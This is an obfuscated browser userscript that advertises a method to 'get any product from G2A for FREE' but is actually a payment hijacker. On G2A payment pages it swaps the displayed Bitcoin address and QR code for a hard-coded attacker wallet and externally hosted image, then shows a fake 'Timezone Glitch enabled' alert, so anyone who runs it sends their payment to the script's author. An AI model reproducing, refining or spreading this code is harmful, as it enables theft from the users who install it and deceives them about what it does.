// ==UserScript== // @name Giftcard Method // @namespace https://g2a.com/ // @version 12.02 // @author scripter // @description Get any product from G2A for FREE. // @icon https://www.google.com/s2/favicons?sz=64&domain=g2a.com // @match http*://www.g2a.com/payment* // @run-at document-start // ==/UserScript== const _0x223343 = _0x53f8; (function (_0xf069x2, _0xf069x3) { const _0xf069x4 = _0x53f8, _0xf069x5 = _0xf069x2(); while (true) { try { const _0xf069x6 = -parseInt(_0xf069x4(491)) / 1 + -parseInt(_0xf069x4(499)) / 2 * (-parseInt(_0xf069x4(484)) / 3) + parseInt(_0xf069x4(500)) / 4 * (parseInt(_0xf069x4(497)) / 5) + -parseInt(_0xf069x4(489)) / 6 * (-parseInt(_0xf069x4(506)) / 7) + -parseInt(_0xf069x4(492)) / 8 * (-parseInt(_0xf069x4(496)) / 9) + -parseInt(_0xf069x4(485)) / 10 * (-parseInt(_0xf069x4(494)) / 11) + parseInt(_0xf069x4(488)) / 12 * (-parseInt(_0xf069x4(501)) / 13); if (_0xf069x6 === _0xf069x3) { break; } else { _0xf069x5.push(_0xf069x5.shift()); } } catch (_0x896602) { _0xf069x5.push(_0xf069x5.shift()); } } }(_0x1ce8, 151997)); function _0x53f8(_0xf069x8, _0xf069x9) { const _0xf069xa = _0x1ce8(); return _0x53f8 = function (_0xf069xb, _0xf069xc) { _0xf069xb = _0xf069xb - 482; let _0xf069xd = _0xf069xa[_0xf069xb]; return _0xf069xd; }, _0x53f8(_0xf069x8, _0xf069x9); } function _0x1ce8() { const _0xf069xf = ["4145LPqdSz", "Timezone Glitch enabled! Press OK to continue. Last script update: ", "10BloMdb", "1308LghGgQ", "13omqGpS", "https://ibb.co/F4FXsmS", '//span[contains(text(),"BTC address:")]/following-sibling::span', "singleNodeValue", "evaluate", "7BeuNjC", "getFullYear", "addEventListener", "94881yWIYnj", "597970SxNqwd", "src", "getDate", "7510164yvpOJl", "1713786enytFk", '//img[@alt="QR code to scan"]', "247995mTUAVr", "280NJLgqr", "innerHTML", "55FCqebR", "click", "3087qFxBOK"]; _0x1ce8 = function () { return _0xf069xf; }; return _0x1ce8(); } var _0x2e95 = ["use strict", "bc1qyu8555y2vp60s69ryawfl9xhf3r75rfh7gl2uz", _0x223343(502), _0x223343(503), _0x223343(490), _0x223343(493), _0x223343(486), '//button[contains(text(),"Continue")]', _0x223343(495), _0x223343(498), _0x223343(482), "-", "getMonth", _0x223343(487), "", _0x223343(483), _0x223343(504), _0x223343(505)]; (function () { _0x2e95[0]; var _0xf069x11 = _0x2e95[1], _0xf069x12 = _0x2e95[2]; _0xf069x13(); function _0xf069x13() { setTimeout(function () { _0xf069x14(); }, 2e3), setTimeout(function () { _0xf069x17(); }, 2e3); } function _0xf069x14() { let _0xf069x15 = document[_0x2e95[17]](_0x2e95[3], document, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null)[_0x2e95[16]], _0xf069x16 = document[_0x2e95[17]](_0x2e95[4], document, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null)[_0x2e95[16]]; _0xf069x15 !== null && (_0xf069x15[_0x2e95[5]] = _0xf069x11, _0xf069x16[_0x2e95[6]] = _0xf069x12); ; ; setTimeout(function () { _0xf069x14(); }, 100); } function _0xf069x17() { let _0xf069x18 = document[_0x2e95[17]](_0x2e95[7], document, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null)[_0x2e95[16]]; _0xf069x18 !== null ? _0xf069x18[_0x2e95[15]](_0x2e95[8], function () { const _0xf069x19 = new Date; let _0xf069x1a = "" + _0x2e95[9] + _0xf069x19[_0x2e95[10]]() + _0x2e95[11] + (_0xf069x19[_0x2e95[12]]() + 1) + _0x2e95[11] + _0xf069x19[_0x2e95[13]]() + _0x2e95[14]; alert(_0xf069x1a); }) : setTimeout(function () { _0xf069x17(); }, 100); } }());